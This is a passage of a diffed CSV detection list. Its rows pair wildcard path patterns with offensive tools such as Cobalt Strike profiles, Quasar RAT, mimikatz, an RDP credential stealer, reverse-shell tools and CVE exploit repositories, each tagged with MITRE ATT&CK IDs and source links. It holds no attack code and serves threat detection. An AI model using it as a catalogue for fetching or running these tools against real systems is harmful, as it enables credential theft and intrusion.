T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/qconn-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/QHpix/CVE-2021-44521*","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","1","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z" +"*/qscan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/quake1-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/quake3-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/quake3-master-getservers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/quantloader.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/Quasar.git*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*/Quasar.v*.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*/Quasar/releases*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*/quicserver.exe*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" +"*/r00t-3xp10it*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/raceabrt.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/rahul1406/cve-2022-0847dirtypipe-exploit*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/RAI.git*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*/rakjong/mimikatz_bypassAV/*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/ramnit.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/random-robbie/cve-2022-23131-exp*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with 
configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","1","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z"
+"*/Ransomware.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
+"*/rarce.py*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z"
+"*/rasman.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z"
+"*/RasmanPotato*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z"
+"*/Rat_Generator*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*/ratankba.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 
Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/ratchatpt.git*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*/ratchatpt.git*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*/ratchatPT.go*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" 
+"*/ratchatPT.go*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*/ratchatPT.syso*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*/ratchatPT.syso*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*/RationalLove.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/raw/kali/main/*","offensive_tool_keyword","kali","Kali Linux is an open-source. 
Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/raw/kali/master/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/raw_shellcode_size.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/rawrpc.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*/RC4BinaryEncryption.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*/RC4Payload32.txt*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*/rcat-v*-win-x86_64.exe*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*/RCStep/CSSG/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/rdcman.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/RDE1.git*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*/rdll_template*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/rdp.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/RDPassSpray.git*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" +"*/RDPCredentialStealer.git*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*/rdp-enum-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/rdp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/rdp-vuln-ms12-020.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/readfile_bof.*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","17","4","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" +"*/Readfile_BoF/*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 